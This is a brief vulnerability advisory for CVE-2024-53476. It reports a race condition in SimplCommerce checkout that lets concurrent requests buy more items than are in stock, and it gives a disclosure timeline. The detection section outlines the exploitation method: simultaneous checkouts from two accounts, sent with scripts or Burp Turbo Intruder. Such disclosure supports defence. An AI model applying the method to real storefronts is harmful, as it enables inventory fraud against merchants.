# CVE-2024-53476
# Description
SimplCommerce is affected by a race condition vulnerability in the checkout logic, allowing multiple users to purchase more products than are in stock via simultaneous checkout requests.

# Detection Method
An attacker can detect this vulnerability by attempting to purchase a product at almost the same time with limited stock (stock = 1) using two accounts. If both accounts successfully purchase the product, it confirms the presence of a race condition. This can be done using custom scripts or Burp Suite turbo intruder to send concurrent checkout requests.

# Tested on
230310c8d7a0408569b292c5a805c459d47a1d8f commit

# Links
https://www.simplcommerce.com/

https://github.com/simplcommerce/SimplCommerce


https://github.com/simplcommerce/SimplCommerce/issues/1111


# Disclosure Timeline
- **November 6, 2024**: Vulnerability discovered and reported to SimplCommerce.
- **November 6, 2024**: CVE ID request submitted to MITRE.
- **December 5, 2024**: CVE ID assigned by MITRE.
- **December 21, 2024**: Affected versions patched by the vendor.
- **December 24, 2024**: Public disclosure of the vulnerability.

# Credits
Abdullah Almutawa